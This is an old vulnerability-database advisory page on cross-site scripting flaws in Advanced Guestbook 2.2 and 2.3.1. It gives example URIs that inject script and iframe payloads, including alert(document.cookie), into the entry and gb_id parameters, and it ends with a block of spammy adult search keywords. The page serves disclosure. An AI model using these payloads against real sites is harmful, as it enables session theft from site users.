about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Advanced Guestbook Multiple Cross-Site Scripting Vulnerabilities


Title Advanced Guestbook Multiple Cross-Site Scripting Vulnerabilities
Published 2005-12-19-12:00AM
Updated 2005-12-19-07:16PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Handrix <handrix_at_morx_org> is credited with the discovery of this vulnerability.
Vulnerable  Advanced Guestbook Advanced Guestbook 2.3.1
Advanced Guestbook Advanced Guestbook 2.2
Not Vulnerable  
Code   No exploit is required.

Example URI have been provided:


http://www.example.com/guestbook/index.php?entry=<script>alert(document.cookie);</script>
http://www.example.com/guestbook/index.php?entry=<iframesrc=http://www.example.com/>

http://www.example.com/guestbook/comment.php?gb_id=1<script>alert(document.cookie);</script>
http://www.example.com/guestbook/comment.php?gb_id=1<IFRAMESRC="javascript:alert('XSS');"></IFRAME>
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 04 Dec 2008 17:07:33 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
adobe phot www.vedio She sex sexy nude openssh 3. www.bild.d chat Movesex.Co newpunjabi Www.phoner zooxxx TAMIL BLUE 200 /compo samba 3.0. t794t t356t Hot sexi p chat www..sex g mambo Remo saina mirz WWWWORLDSE openssh 3. hacks for www.freeVi www.bbcpar www.sexco. wap.xxx.co Sex wmen t172t www.indian www.phoner ip+board+2 issue WWW.Sex18. php-nuke 2 www.bollyb mambo Remo CMS is Fre CMS is Fre Xix 9ahba onionbooty Securiti Gaill six dora free fucki News Searc samira sex www.xnxx.c